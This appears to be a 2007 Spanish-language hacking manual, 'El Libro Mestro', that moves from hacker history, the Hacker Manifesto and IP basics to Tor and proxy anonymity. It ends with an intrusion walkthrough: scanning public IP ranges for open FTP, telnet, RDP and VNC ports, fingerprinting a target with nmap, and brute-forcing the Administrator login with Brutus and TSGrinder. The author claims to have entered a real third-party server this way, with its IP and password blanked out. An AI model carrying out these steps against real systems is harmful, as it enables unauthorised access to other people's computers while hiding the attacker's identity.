Está en la página 1de 105

El Libro Mestro__________________________________________ - 1 -

Porque escribimos este Libro



Porque sabemos que no existe ningun manual, ningun libro, ningun foro, ninguna web,
que nos ensee como hacer ciertas cosas
Porque el 90 % de los manuals son muy buena informacion pero antigua.
Y por otro lado conseguir algo de informacion, veraz, o el software necesario, nos lleva a busquedas
eternas, a llenarnos de spyware, de malware y de algun que otro virus
La mayoria de los que dicen que nos enseniaran, saben menos que nosotros, y nos agarran para conejillos
de Indias

Asi que aqui no encontraras definiciones suntuosas, esto esta escrito de manera tal que se entienda la idea,
y que pueda ser llevada a cabo.
Quien quiera mas profundidad, pues puede buscarse su propia informacion, o visitar nuestro foro.

De que trata, que hay en este libro?
Trataremos temas variados, desde como conseguir una intrucion, el metodo real, a como cuidarte para
evitarla.
Explicaremos sobre metodologias y tecnicas, para lograr tus objetivos.
No es solo una introduccion mediocre al tema, encontraras, capturas, explicando paso a paso
Como lograr ciertos objetivos, otros quedaran a tu imaginacion.
Tal vez te surjan dudas luego, lamentablemente los libros no contestan, pero podemos ofrecerte nuestra
ayuda, si pasas por nuestra pagina web, y nuestro foro.




www.ale666.com

Digitally signed by 666
DN: cn=666, c=US, o=CP666Group,
ou=www.ale666.com,
email=666@ale666.com
Location: Sanford-Fl-32771
Date: 2007.04.04 00:24:42 -04'00'

El Libro Mestro__________________________________________ - 2 -



























Historia de la palabra Hacker

A pesar de su gran difusion desde los 80 cuando se hacen populares ataques ciberneticos a diversas
entidades, y otras felonies.
A pesar de que el manifiesto Hacker data de 1986, la palabra mal usada hoy dia Hacker. Proviene de el
principio de los aos 50.

La palabra Hack, era utilizada, por estudiantes del M.I.T. a principio de los 50, para referirse a cualquier
tipo de accion divertida, si fuese en espaol, seria un lunfardo, por no aparecer entre los libros de la Real
Academia de Ciencias y Letras,pero el idioma ingles en EE UU, no tiene regulaciones, por lo cual la
adopcion de una nueva palabra, pasa a ser parte del lenguaje.

A mediados de los 50, en el M.I.T., denominaban Tunnel Hacking a la divertida accion, de sobrepasar
las fronteras fisicas, sea del establecimiento, de una oficina cerrada, etc.


En el mismo periodo, el Sistema telefonico del mismo instituto, ofrecia las mismas posibilidades de
diversion, intentando conectar al exterior, desde internos, comunicaciones cruzadas, sin pasar por la central,
etc esta actividad era denominada
Phone Hacking.

En esos momentos dentro de la institucion, existia un grupo de estudiantes llamados Tech Model Railroad
Club. Ellos, desarrollarian un complejo circuito electronico, para el manejo de multiples vias ferreas.
Estos estudiantes declararon que lograron su cometido impulsados por la misma motivacion que el Phone
Hacking, entonces , aparece sola la palabra Hacking,
Fue utilizada, para denominar a la accion de optimizar, mejorar y llevar al extreme, los conocimientos
sobre los circuitos que ellos trabajaron.

www.ale666.com


El Libro Mestro__________________________________________ - 3 -
A todo aquel que trabajaba en ese proyecto, se le llamo HACKER.

A fines de los 50 llegaria al M.I.T. el primer computador TX-0,

esto hizo que el grupo Tech Model Railroad Club, cambiara los circuitos de vias ferreas, a los del nuevo
computador.

El termino Hacking, fue aplicado entonces a la actividad de crear, o mejorar las aplicaciones ( software)
para ese computador.

Computer Hacking, era la denominacion entonces.

Estos Hackers, a principio de los 60 crearon el primer video juego interactivo Spacewar,

www.ale666.com


El Libro Mestro__________________________________________ - 4 -
El cual demostro grandes inovaciones, para su epoca, y dado que la creacion del juego fue por diversion,
este se expandio libremente por todo el mundo, para la revision de cualquier estudiante que quisiera, jugar
o mejorar

Ya para los aps 70 el termino Hacker, era utilizado elitistamente, para denominar a aquellos exelentes
programadores de software, que eran los primeros Gurus

Luego Hacking ya no solo se utilizaba, como referencia a la programacion, sino que definia tambien una
forma de vida, una Cultura

Con la expancion del proyecto ArpaNet, el concepto de Hacker/Hacking, tomaria nuevos rumbos, dads las
posibilidades que en ese momento surgian, con las Redes de Computo.

Para ese momente el peldao o jerarquia de Hacker era muy dificil de alcanzar.

En los 80 con muchas oportunidades donde destacar, con la novedad, muchos grupos anarquicos ,
tomaron el termino como propio, y se dedicaron a la maliciosa tarea de irrumpir en redes y sistemas,
creando daos irreparables en muchos casos, los primeros robos por intrusion, Dando todo esto como
resultado la aparicion de una nueva cultura en el cybermundo Los Crackers.

Al aparecer en 1986 el Manifiesto Hacker, Los medios de prensa tuvieron de donde sostenerse, para
desinformar al mundo, y hacer mal uso del termino Hacker
Haciendo que los delitos de un Cracker fueran denominados Hackingy todos en la misma bolsa

Conclusion: el saber hacer un Puente para encender un vehiculo, NO te transforma en Igeniero Motriz.
Lograr irrumpir en la pc del vecino odioso y borrarle C:/ no te Hace un Hacker

Son cosas muy distintas, no son ni un Escalon mas , ni uno menos.
No es el comienzo, porque aun no se

Si se quiere ser doctor, no se estudia Carpinteria o Plomeria

Si deseas ser doctor y quieres aprender cosas utiles para tu futuro, comienza por primeros auxilios, luego
enfermeria si quieres, pero no te servira estudiar Floricultura

Tal vez no sea nadie para opinar, pero igual.

Hacker/Hacking yo lo denomino, como una forma de vida, una forma de expandirse uno mismo, y no es un
termino aplicable solamente a las compus

Hackea tu Guitarra si quieres, explora de que manera se fabrican, cuales son las mejores maderas,
pegamentos, medidas, intenta mejorarla, crea tu instrumento, aprende a tocar, buscale las mil y una
posibilidades y seras un Hacker

Hackea lo que quieras y difunde tu conocimiento, para que los otros puedan opinar, puedan explorar,
puedan mejorarte, y asi tendras un Nuevo Reto.

Eso es ser Hacker








www.ale666.com


El Libro Mestro__________________________________________ - 5 -


















El Manifiesto del Hacker
Hoy han cogido a otro, aparece en todos los peridicos. "J oven arrestado por delito informtico",
"hacker arrestado por irrumpir en un sistema bancario".
"Malditos cros. Son todos iguales".
Pero pueden, con su psicologa barata y su cerebro de los aos cincuenta, siquiera echar un
vistazo a lo que hay detrs de los ojos de un hacker? Se han parado alguna vez a pensar qu
es lo que les hace comportarse as, qu les ha convertido en lo que son? Yo soy un hacker,
entre en mi mundo. Mi mundo comienza en el colegio. Soy ms listo que el resto de mis
compaeros, lo que ensean me parece muy aburrido.
"Malditos profesores. Son todos iguales". Puedo estar en el colegio o un instituto. Les he odo
explicar cientos de veces cmo se reducen las fracciones. Todo eso ya lo entiendo. "No, Sr.
Smith, no he escrito mi trabajo. Lo tengo guardado en la cabeza".
"Malditos cros. Seguro que lo ha copiado. Son todos iguales".
Hoy he descubierto algo. Un ordenador. Un momento, esto mola. Hace lo que quiero que haga.
Si comete errores, es porque yo le he dicho que lo haga.
No porque yo no le guste, me tenga miedo, piense que soy un listillo o no le guste ni ensear ni
estar aqu.
Malditos cros. A todo lo que se dedican es a jugar. Son todos iguales. Entonces ocurre algo... se
abre una puerta a un nuevo mundo... todo a travs de la lnea telefnica, como la herona a
travs de las venas, se emana un pulso electrnico, buscaba un refugio ante las incompetencias
de todos los das... y me encuentro con un teclado.
www.ale666.com


El Libro Mestro__________________________________________ - 6 -
"Es esto... aqu pertenezco... ". Conozco a todo mundo... aunque nunca me haya cruzado con
ellos, les dirigiese la palabra o escuchase su voz... los conozco a todos... malditos cros. Ya est
enganchado otra vez al telfono.
Son todos iguales... puedes apostar lo quieras a que son todos iguales... les das la mano y se
toman el brazo... y se quejan de que se lo damos todo tan masticado que cuando lo reciben ya ni
siquiera tiene sabor. O nos gobiernan los sdicos o nos ignoran los apticos. Aquellos que tienen
algo que ensear buscan desesperadamente alumnos que quieran aprender, pero es como
encontrar una aguja en un pajar.
Este mundo es nuestro... el mundo de los electrones y los interruptores, la belleza del baudio.
Utilizamos un servicio ya existente, sin pagar por eso que podran haber sido ms barato si no
fuese por esos especuladores. Y nos llamis delincuentes. Exploramos... y nos llamis
delincuentes. Buscamos ampliar nuestros conocimientos... y nos llamis delincuentes. No
diferenciamos el color de la piel, ni la nacionalidad, ni la religin... y vosotros nos llamis
delincuentes. Construs bombas atmicas, hacis la guerra, asesinis, estafis al pas y nos
ments tratando de hacernos creer que sois buenos, y an nos tratis de delincuentes.
S, soy un delincuente. Mi delito es la curiosidad. Mi delito es juzgar a la gente por lo que dice y
por lo que piensa, no por lo que parece. Mi delito es ser ms inteligente que vosotros, algo que
nunca me perdonaris. Soy un hacker, y ste es mi manifiesto. Podis eliminar a algunos de
nosotros, pero no a todos... despus de todo, somos todos iguales.





Para comenzar:
Que es IP
By 666 & Pyros

Imaginemos a internet como una ciudad. Bien, cada casa es un servidor y como toda casa, tiene una
direccion.
Supongamos que dentro de cada casa hay miles de puertas y para no confundirlas,
todas tienen un numero encima.

Las direcciones de los servidores(casas) son llamadas direcciones IP,
La IP es un numero (en este momento), formado por cuatro grupos de 3 numeros
O sea xxx.xxx.xxx.xxx, ejemplo 68.123.45.67. (068.123.045.067) se pueden evitar los ceros
Maximo numero 255.255.255.255
Puede tener 4.228.250.625 formas distintas.

En cada habitacion hay una cosa distinta, en algunas se lee el correo, en otras se habla...

Para mantener comunicada nuestra imaginaria ciudad al alcalde ha puesto un servicio de carteros 24 horas.
Un cartero va de habitacion 21 en habitacion 21, otro va de habitacion 25 a habitacion 25 por todas las
casas.

A parte de un buen sueldo, estos carteros tienen un nombre; Protocolos.

Si en cada habitacion hay un programa, y yo soy el programa de la habitacion 25 puedo mandar un mensaje
de correo a otra habitacion 25 de otra direccion gracias a un protocolo mu majo k se llama SMTP.
Si yo soy un programa de la habitacion 21 puedo mandar un archivo a otra habitacion 21 de otra casa
gracias al seor protocolo FTP , y asi con todos los puertos (habitaciones)

www.ale666.com


El Libro Mestro__________________________________________ - 7 -
Hay veces que los Protocolos no se dirigen solo a un puerto sino que funcionan con todos (o casi todos) los
puertos pero solo envian datos.
Cada una de las aplicaciones que trabaja con cada puerto puede estar enviando o esperando un envo.

IP=Internet Protocol, es una forma de comunicar datos a traves de una red de paquetes conmutados
IP no tiene mecanismos de autenticacion, no sabe si un paquete llega a su destino o no, si llega daniado o
no.
Si necesitaramos la fiabilidad de saber si llega y en que estado, debemos incluir otros protocolos como los
son Capa de Transporte o TCP

Asi se llega a TCP / IP como protocolo de transferencia.

Que es entonces una DIRECCION IP

Esta es la manera de identificar un dispositivo dentro de una red que utilize protocolo IP


Asi pues cada vez que una computadora se conecta a la internet, debe tener un numero de este tipo, que
sera como su direccion, en ese momento esta direccion IP sera unica en toda la red (internet)

Segun la compania que nos da servicio, podemos tener una direccion IP estatica o una direccion IP
Dinamica,
La IP Estatica no cambia nunca, podemos desconectarnos, apagar nuestro ordenador, y la proxima vez que
nos conectemos a la red, tendremos el mismo numero

La IP Dinamica, todo lo contrario, habitualmente cada vez que conectamos a la red, nuestro proveedor de
servicio de internet, nos da un numero distinto

Modem: dispositivo, que modula y desmodula una senial, o sea, nuestro ordenador emite una senial digital,
nuestro modem la convierta a anolaga, para poder ser transmitida y del otro lado sera nuevamente
modulada para ser recibida como digital por otro computador.

Los llamados modem adsl o rdsi no cumplen esta function, son mas parecidos a la function de una tarjeta
de red.

Conclucion es un dispositivo que nos conectara a la internet.

Router:el router es otro dispositivo, encargado de tomar la senial, y administrarla, de manera que este
aparatito, tomara tu IP publica, la que te da tu compania de internet, y se la queda.
A su vez a las computadoras que se conectan a este router, este les asignara una IP PRIVADA, por lo
que

Todas las pcs, conectadas a ese router, tendran una ip privada distinta habitualmente 192.168.xx.xx
Hacia afuera del router, todas las pcs tendran la misma ip asignada por tu compania de internet

Tu ip publica, la sabras llendo a ejemplo, o http://www.ip-adress.com , www.ipchicken.com, tu ip, privada
la sabras llendo a inicio, correr, escribes cmd, y en la ventana de MsDos escribes IPCONFIG y le das enter.

www.ale666.com


El Libro Mestro__________________________________________ - 8 -



Si tu ip es la misma, la publica y la privada es que no utilizas un router.

Si alguien quiere una definicion mas correcta de lo que es un router con buscar en google o wikipedia,
alcanzara

Switch / hub, son dispositivos, para la administracion de coneccion, por un lado ingresa la coneccion
proveniente de un router, y desde sus puertos, podras darle conexion a la red a todas las pcs que conectes.

La diferencia en el nombre es por la forma en que manejan los paquetes de datos.

Firewall, hardware o software, es algo asi como un vigilante de los puertos de tu pc.




Todo lo que intente entrar o salir ( segun) de tu pc, necesitara de tu consentimiento sino, este hardware o
software, cerrara el puerto, impidiendo asi la transferencia de datos de una PC a otra.

Como obtener una IP estatica (si se quiere o necesita), pues la mejor forma es contratar un servicio de
internet, que nos de este servicio , en muchos casos no lo ofrecen o es mas costoso, entonces lo
solucionaremos de esta manera.

Las paginas de internet, son, o estan en un numero ip

O sea, todos conocemos http:// 64.233.179.99 o http:// 209.73.186.238,

Pero se nos hace muy dificil, recordar todos los numeros, entonces tenemos esto, hay servicios de
asociacion de numeros IP con un nombre

Es mas facil recorder www.google.com , o www.yahoo.com

Esto mismo podemos hacerlo nosotros y de esa manera tendremos un nombre en vez de un numero, y a
su vez con un pequenio programa, este se encargara de actualizar, nuestro numero con nuestro nombre a
cada momento, asi de esta manera, obtendremos nuestra ip estatica

www.ale666.com


El Libro Mestro__________________________________________ - 9 -
Para esto debemos ir a www.no-ip.com





Le haccemos click, en sign up now,
Rellenas la informacion


www.ale666.com


El Libro Mestro__________________________________________ - 10 -
Y le das click al final de la pagina



Ahora descargamos el software hacienda click en el icono de nuestro sistema operativo

En este caso Windows



www.ale666.com


El Libro Mestro__________________________________________ - 11 -


Le damos a este link



Y por fin lo descargamos

Buscamos donde guardarlo
Y ya
www.ale666.com


El Libro Mestro__________________________________________ - 12 -


Ahora debemos ir a nuestro e-mail, (el que utilizamos en el registro
Encontramos el e-mail




Lo abrimos, y le damos click al link de activacion






Se nos abrira una nueva pagina, que nos dira que ya hemos activado la cuenta
Ahora debemos loguear, con el e-mail, y el password.para entrar en nuestra cuenta gratis.

www.ale666.com


El Libro Mestro__________________________________________ - 13 -




Luego de loguear vamos al link de la izquierda que dice ADD, para elegir nuestro futuro nombre



Ahora aqui elegiremos, nuestro nombre, y el final de nombre que nos guste o recordemos facilmente.

www.ale666.com


El Libro Mestro__________________________________________ - 14 -


Del resto no tocamos nada, solo le damos click a Create host


Ya podemos cerrar, y volver al programa que descargamos

Buscamos el programa y le hacemos doble click

www.ale666.com


El Libro Mestro__________________________________________ - 15 -






Ahora nos sale un splash y luego una ventana donde debemos ingresar nuestro e-mail (el del registro) y el
password.


www.ale666.com


El Libro Mestro__________________________________________ - 16 -


Se nos abrira, ahora


Y al cabo de unos segundos, aparecera nuestro no-ip.

Clickeamos en la casilla de la izquierda, lo dejamos marcado, y ya lo podemos cerrar

En la barra al costado del reloj veremos el icono

Desde ahora, tendremos una IP fija, o un nombre de dominio.

En mi caso cp666ss.no-ip.info, y en el caso de ustedes el que elijieron.

Asi que desde ahora en vez de utilizar nuestra direccion IP podremos utilizar nuestro nombre, para que?
para muchas cosas, inclusive montarnos un servidor web en nuestra PC

Todo esto es solo informacion superficial, nada profunda, solo los pasos necesarios para
Obtener nuestra IP estatica o nombre de dominio,

Por otro lado, ese nombre o IP, sera vista por todo el mundo, es tu identificacion, dentro de la internet.

Cada vez que visitas una web, ellos saben tu ip, cada vez que navegas, tu ip esta alli, a la vista de todo el
mundo

www.ale666.com


El Libro Mestro__________________________________________ - 17 -
Como escondernos, o como ocultar, nuestra IP
(un poco )
Esta es una base fundamental, para no reveler quien somos
Recordando que: cada PC conectada tiene una direccion IP unica, pues se hace evidente que es possible
buscar esa direccion y encontrar a su duenio Si bien no es algo que como seres humanos normales
podamos hacer, hay persomas, gobiernos, entidades, que disponen del tiempo, el dinero y el poder para
lograrlo.

El usuario normal, o avanzado, lograra saber: cual es tu IP, quien te da servicio de Internet y la zona
geografica aproximada donde vives ciudad, estado, pais, no mas de eso.

Aqui dare algunos metodos para este cometido de esconder nuestra IP

A mi forma de ver, lo mas sencillo, para la navegacion anonima en la web, es utilizar
Un programa basado en Mozilla Firefox, y que conecta tu PC a un circuito de Proxies, mostrando
publicamente la IP del proxie, y no la tuya.
TORPACK
Su web http://www.torrify.com/download.php
O lo puedes descargar de aqui

Cuando lo abres

Te aparece este warning advirtiendote que navegaras anonimamente, pero que los datos que envias pueden
ser capturados (normal en todos los navegadores incluyendo I.E.)



Al abrirse ire a una pagina web que me dira mi IP, como esta desabilitado, sera mi IP verdadera.

www.ale666.com


El Libro Mestro__________________________________________ - 18 -


Si hacemos click en donde marca Tor Disabled, Cambiara su estado a Enabled
Nuevamente voy al mismo sitio. Y



Ya se que mi IP esta cubierta, de aqui en mas podre navegar anonimamente.
* Hay paginas web que bloquean su contenido si uno utiliza Proxys
Con solo hacer click en Flush Circuit y refrescar y ir nuevamente a la paina, cambiara tu IP




www.ale666.com


El Libro Mestro__________________________________________ - 19 -
Mozila Firefox, con el add on Foxy Proxy

Esto no es mas que el navegador FIREFOX con un add on (aplicacion incorporada),
Que nos permite hacer exactamente lo mismo que Torpak, solo que nosotros podremos escoger a que
proxyes conectarnos.
Descargas el Mozilla Firefox de su web official
http://www.mozilla.com/en-US/
Y luego en su pagina buscas los Add ons, eliges el Foxy Proxy, lo instalas.
Vas a google, y buscas free proxy servers de alli sacaras los datos para tu propia lista de proxys
Las ventajas de Mozila sobre Torpak, tan solo que puedes elegir tu los proxys mas veloces. (en muchos
casos los servidores proxys desaparecen en dias, semanas,etc)



Estodos dos nos permiten Navegar anonimamente, pero que hay del resto de aplicaciones que podriamos
utilizar?
Pues no, esto solo nos hacia invisibles para navegar por la web, asi que ahora explicare un metodo para
poder ser anonimo con otras aplicaciones



Vidalia, Privoxy, Tor es un conjunto de aplicaciones, que vienen juntas, y que nos ayudan a conectarnos al
circuito Tor
ODescarga de la pagina official http://tor.eff.org/download.html.en
Instalacion y uso
Doble click para instalar



Le damos a NEXT
Nos cersiramos que los tres programas esten marcados y NEXT nuevamente
www.ale666.com


El Libro Mestro__________________________________________ - 20 -


Luego click en Install



Y el proceso de Instalacion, termina aqui, hacienda click en Finish


www.ale666.com


El Libro Mestro__________________________________________ - 21 -
El programa (los) correran, nos saldra inmediatamente una ventana
Que cerraremos,

Tendremos dos nuevos iconos al lado de nuestro reloj

Si alguien se quiere leer el manual mejor, en este caso explicare como configurar para poder acceder a
ay multiples opciones mas.
Abrimos el I.E. vamos a Tools, internet options
internet,
H



Nos dirigimos a la lengueta de Connections, y debajo le hacemos click a LAN settings

www.ale666.com


El Libro Mestro__________________________________________ - 22 -



Marcaremos la opcion Use a proxy server
En address escribieremos, localhost y en el puerto 8118

En caso de que nuestra PC este en una red interna, y que tenemos acceso a las otras PC
Y queremos seguirlo teniendo cuando utilicemos el proxy, en ese caso marcaremos la casilla
Bypass proxy server for local addresses
(marcada en rojo en la figura)
Si no es el caso, dejarla desmarcada.




Le damos OK, cerramos todo, inclusive el Internet Explorer, y lo abrimos nuevamente.

www.ale666.com


El Libro Mestro__________________________________________ - 23 -


Nos sale esto, eso es porque no hemos activado aun asi que nos dirigimos al Icono de nuestra barra, el
que esta al costado del reloj y vemos un icono tachado
Le hacemos click, derecho o izquierdo, y le damos a start


Nuestro icono cambiara quedando Amarillo primero y luego verde
Si no habiamos cerrado el I.E. lo cerramos, y lo volvemos a abrir.
Si quieres puedes chequear tu ip


En este caso, no es la mia
www.ale666.com


El Libro Mestro__________________________________________ - 24 -
Si quieres volver a la normalidad, tu conexion, bastara con deshacer los pasos hechos. Parar Tor
Y quitar el Use proxy server de las opciones.
Estando encendido, Todas las conexiones, que salgan pasando por localhost, seran con la IP del servidor
proxy, no con la nuestra, esto incluye, cualquier tipo de aplicaciones.
Creo que ya queda bastante info sobre esto.



















































www.ale666.com


El Libro Mestro__________________________________________ - 25 -


INTRUCION
( Del lunfardo hackear una PC )


Aqui no se explica un metodo infallible, no se explica a cual se puede y cual no, muestra, una metodologia
de trabajo expresada en un papel, que dada ciertas condicionantes, se lograra el objetivo.

Pero basicamente, este manual, plantea, que aun hoy es posible, y que maana lo sera,
De que forma. Metodo

Esto no sera un proceso completo mostrado, ya que no quiero hacer una intrucion y mostrarla aqui, le
hablare de ciertos metodos, y software a utilizar, y si lo leen por completo, veran que el ponerlo en practica,
es lo que da los resultados, cada seccion tiene un porque,

Y eso es todo

Si bien utilizare un lenuaje sencillo para la descripcion, hay terminos, que daremos por hecho, que saben lo
que son o significan. Tipo Host, Ip, Rdp, tcp, firewall router, switch y si alguien desconoce estos terminos,
le recomiendo ya mismo que pase por wikipedia y lea antes de continuar.





Busqueda y descubrimiento de un Host

Esta seccion sera de que forma encontramos Host disponibles para nuestro ataque.
Para esto utilizaremos el Angry IP Scanner, con la finalidad de descubrir que IPs son viables .
Tambien si tienes en mente una IP objetivo en particular, pues puedes escanear algunas antes, y algunas
despues, ya que el mismo servidor, o compania, u organizacion, podria disponer de mas de una IP y tal vez
las otras sean mas accesibles como sabras, si pertenecen al mismo dominio, compania, etc?
Por el nombre

Si no lo tienes, lo descargas de aqui. Angry IP Scanner

Abrimos el Angry IP, y pondremos el rango de IPs que vamos a escanear, mas amplio el rango, mas
demorara el escan en terminar su tarea.

En este caso el rango elegido para escanear es de 68.156.0.0 hasta 68.156.255.255
Cada uno puede poner los valores IP que guste, dependiendo de lo que busquen.

www.ale666.com


El Libro Mestro__________________________________________ - 26 -


Ahora le pondremos configurar que puertos queremos escanear, teniendo en cuenta cuales serian posibles
de ser atacados.
Puerto 21 ftp
Puerto 23 telnet
Puerto 3389 RDP
Puerto 593 http-rpc-epmap
Puerto 5800 Vnc
Puerto 5900 Vnc Web
O cualquier otro puerto que quieran explotar vulnerabilidades.
Para este ejemplo utilizare el puerto 21 y el 3389

Para esto, vamos a Options / Select Ports


www.ale666.com


El Libro Mestro__________________________________________ - 27 -
En la pequenia ventana que se nos abre, pondremos los puerto elegidos, separados por una coma , como
se ve en la imagen


Le damos OK


Del mismo Menu Opciones, ahora seleccionamos la opcion Select Columns,
Con los valores mostrados en la siguiente figura, se vera que nos quedamos solo con tres valores, esto
tambien acelera el proceso de escaneo, aparte de que la otra info, en este caso, no nos es util.

Ahora estamos listos para escanear, le damos al boton start , y ahora sera cuestion
De esperar a que finalice el proceso


Terminado el escaneo, lo que haremos, sera borrar las IPs muertas, que son las que aparecen con un circulo
rojo , y esto lo haremos desde el la opcion
UTILS/ Delete from List/Dead Host.
www.ale666.com


El Libro Mestro__________________________________________ - 28 -


Ahora disponemos de dos tipos de host vivos.
Aquellos de los que no tenemos info, ni puertos abiertos (de los que chequeamos.)
Y tenemos los host en verde, que debajo de su nombre nos dira, cual es el puerto disponible

Si queremos hacer bien nuestro trabajo, y utilizamos un rango de IPs grande que nos tomo mucho tiempo,
lo conveniente, es exportar los datos, asi de esta manera, los tendremos disponibles en cualquier momento
que quieramos.

www.ale666.com


El Libro Mestro__________________________________________ - 29 -
Asi que vamos al FILE/Export all la forma de exportarlo,
depende de nosotros, Si tenemos instalado Office o Exel en nuestra PC, nos conviene, el formato Comma-
separated Files, .csv,




y nos guardaremos la lista que se vera de esta forma


www.ale666.com


El Libro Mestro__________________________________________ - 30 -
Con esto queda finalizado, el tema de host discovery mostrando de que forma podemos descubrir, PCs
vivas, y con ciertos puertos abiertos, que en otro capitulo hablaraemos de como explotarlos para sacarlo
provecho.





Deteccion de Sistema operativo

Aparte de necesitar esta info, para luego buscar vulnerabilidades, podemos utilizarlo para verificar la info
descubierta anteriormente, y analizar la estructura possible de la red o PC en cuestion.

Para esta tarea, utilizaremos otro Scanner el NMAP, este, hace un trabajo exelente en una cantidad de
campos distintos.
Les dejo aqui un pequenio ejemplo de funciones

Los descargan de aqui.NMAP


-sT TCP Full Connect Option
-sS - TCP Syn Scan Option
-sU nmap will also scan UDP Ports (warning this wont give entirely reliable results.)
-O - Operating System Detection (TCP/IP Fingerprinting)
-sV - Service Version Detection
-P0 - Dont Ping the Host, J ust Scan It
-F Do a Fast Scan on the Target Host (Scans on the ports in the nmap services file.)
-p - Choose the ports to scan from e.g. 0-65535
-n Dont do a reverse DNS lookup
-T - [0-5] Set timing template (higher is faster.)
-S [IP Address] Spoof Sender IP Address (Your IP Address.)
-v Verbose Output
-A Aggressive, use both OS Detection and Service Version Detection.
-vv Very Verbose Output


TCP Full Connect Option es el escaneo que hacemos a todos los puertos, o a ciertos puertos , el escaner
trata de conectar, si lo logra, esta abierto, si no lo logra pues no. (Fue lo realizado con el Angry Ip
Scanner)

TCP Syn Scan este es similar al anterior, con cierta diferencia, para saber un poco mas busque info sobre
TCP Three-way Handshake.La explicacion sencilla seria, el envio de un paquete syn a un puerto del
objetivo, y se espera la respuesta. Recibida una respuesta,
Se generara la conexion.

ACK Scan este es el envio de paquetes a cada uno de los puertos de la pc objetivo
Si no se obtiene respuesta de este envio se supone que el puerto esta filtrado, si se consigue respuesta, pues
es un puerto expuesto, esto no significa que el puerto este abierto, solo detecta si el puerto es protegido por
algun tipo de firewall, o software.

RST Scan Similar al anterior la diferencia esta que aqui se envian paquetes RST
Lo interesante de este escaneo, es que es capaz de pasarse, algunos sistemas de deteccion de intrusos y que
tiene la capacidad de resetear un puerto TCP

Para mas info sobre los tipos de escaneo que hace el NMAP, leer el manual de su WEB
www.ale666.com


El Libro Mestro__________________________________________ - 31 -

En el siguiente ejemplo, mostrare como utilizar el nmap, para hacer un full tcp, deteccion de sistema
operativo y detectar la version del servicio correspondiente.
Para esto utilizare alguno de los host, que he descubierto con el Angry Ip Scanner, voy a la lista exportada,
elijo mi objetivo, abro el nmap,
Y alli ponemos nmap F A P0 vv sU Ipobjetivo

Aqui les dejo una muestra de lo encontrado en el host elegido



Vemos entonces: confirmacion de lo que el Angry IP Scanner nos mostro, tenemos, info de otros puertos, y
no puse el resto de la info obtenida, para que no se viera el host que elegi. Para mi ataque
Pero basicamente obtuve el sistema operative, Windows 2003, y la version de este servicio corriendo en el
host.
Otra informacion tambien es mostrada, va en cada uno lo que busca.

Login Remoto


Fuerza Bruta Remota.
Dado que en el ejemplo anterior, descubri algunos puertos para poder intrucionar en la PC objetivo, pero
estas son conecciones con autenticacion, necesito alguna herramienta para esa function.

En principio, una de las mas utiles y conocidas, por eso es que no gastare papel y tiempo en su explicacion.
(es mas, supongo que ya la abran utilizado)

Lo descargas de aqui BRUTUS Aet2

Este programa (igual que otros) nos permite probar passwords en determinados servicios remotos.
En html estandar, en html form, en un ftp, y mas
La forma de realizar esto es por medio de listas de user-pass, o decidiendo nosotros el user a utilizar
(Administrator) , y una lista de passwords, o el clasico brute force, le damos un numero de caracteres,
cuales, y el programa probara todos los posibles hasta
Dar con una combinacion correcta para autenticar.

No es algo rapido, esto puede llevar su tiempo, quien pueda, es recommendable utilizar mas de una PC para
esta tarea, asi de esta forma lograras el objetivo, mas rapido, distribuyendo el trabajo.

Con esto estariamos autenticando en mas de un puerto, y teniendo acceso al interior de la pc objetivo, en
algunos de los servicios nombrados anteriormente.

Fuerza bruta en RDP (remote desktop protocol)

Esto es lo que muchos llaman, servicio de terminal, o terminal service.
Una function muy util a todo nivel, ya que uno trabaja en una pc remota, como si estuviera sentado en
frente de ella.
www.ale666.com


El Libro Mestro__________________________________________ - 32 -
A tener en cuenta, el loguear un usuario, desloguea a otro, el deslogueado tendra en su monitor, la
posibilidad de loguear nuevamente.

Hay ciertos mensajes de advertencia, tanto en la pc logueada, como en la pc utilizada para hacerlo.
Utiliza el puerto 3389 ( si nadie lo ha cambiado)
TSGrinder esta es una herramienta muy util, dado que el proceso automatizado que utiliza para el brute
force, es muy eficaz a la hora de intentar loguear en un escritorio remoto.

El programa lo descargas de aqui TSGrinder
Basado en linea de commandos:


-w c;\dict.pw le indica al programa que diccionario utilizar
------------------------------------------------------------------------------------------------------------
-u name le dice al programa que usuario intentaremos loguear
(administrator/administrador) serian la mejor opcion,
si no conocemos un nombre de usuario, con derechos de RDP
------------------------------------------------------------------------------------------------------------
-d dominio Seria necesario darle esta info, si nuestra pc objetivo, si mi pc no
estuviera en un dominio
------------------------------------------------------------------------------------------------------------
-n 2 Esto es para intentar doble coneccion, hacer el doble de trabajo, no
siempre es bueno, depende tanto del ancho de banda de nuestra
coneccion, como el de la conexion de la pc objetivo




He tapado la IP por razones obvias, no quiero reveler a donde tuve acceso.

Si no se especifica una lista de passwords en particular, el programa usara la default, en root, con el nombre
Dic

El programa comenzara el intento

www.ale666.com


El Libro Mestro__________________________________________ - 33 -



Probando siempre con el nombre Administrator, y cada vez con un password diferente de la lista DIC se
edita con el notepad.exe
Conviene hacerse de buenas listas.
Es possible tambien que se nos caiga la conexion, tanto por los intentos de logue fallido, como por otros
motivos, tan solo si sucede, modifican la lista para que no comience desde el principio y vuelta a la batalla.

El programa nos ira mostrando el avance logrado



www.ale666.com


El Libro Mestro__________________________________________ - 34 -
Y con tiempo y unas buenas listas de palabras obtendras esto




He removido el password. Pero como se ve, tuve exito.

Asi que ahora lo unico que necesitamos es abrir nuestra coneccion a escritorio remoto



Boton Inicio/Programas/Accesorios/Comunicaciones

Si no esta instalado, debes instalarlo, desde el panel de control, agregar quitar programas, la opcion,
components de windows, de la ventana elijes Internet Information Services (IIS), le das a detalles, en
detalles buscas, World Wide Web Services, lo marcas y nuevamente le das al boton detalles, ahora debes
marcar la casilla correspondiente al remote desktop connection, luego OK dos veces, next, finish, y ya
estara instalado.
Vale recorder que para este proceso se debe tener: el cd de windows, o una copia de el en el disco duro.




Ingresamos la IP que tenia nuestro host le hacemos click en Connect
Nos aparecera la magica pantallita de

www.ale666.com


El Libro Mestro__________________________________________ - 35 -


Y ya sabemos que con el User administrator y el password descubierto con el TSGrinder deberiamos
ingresar
pues probemos



Ahora le doy a OK
Y Voila, me recibe un mesaje de de que outlook no es el cliente de mail, predeterminado..
Asi que deben utilizar otro.
www.ale666.com


El Libro Mestro__________________________________________ - 36 -





Ok, ahora me desconectare tan solo es necesario hacer un Log off, y todo volvera a la normalidad
www.ale666.com


El Libro Mestro__________________________________________ - 37 -



No recomiendo hacer un shut down, porque estariamos apagando el servidor, y uno no sabe ( o si, si revisa
) que hay en ese server, y que danio causaria al duenio poniendolo offline. Asi que sencillamente nos
deslogueamos, y asunto resuelto.




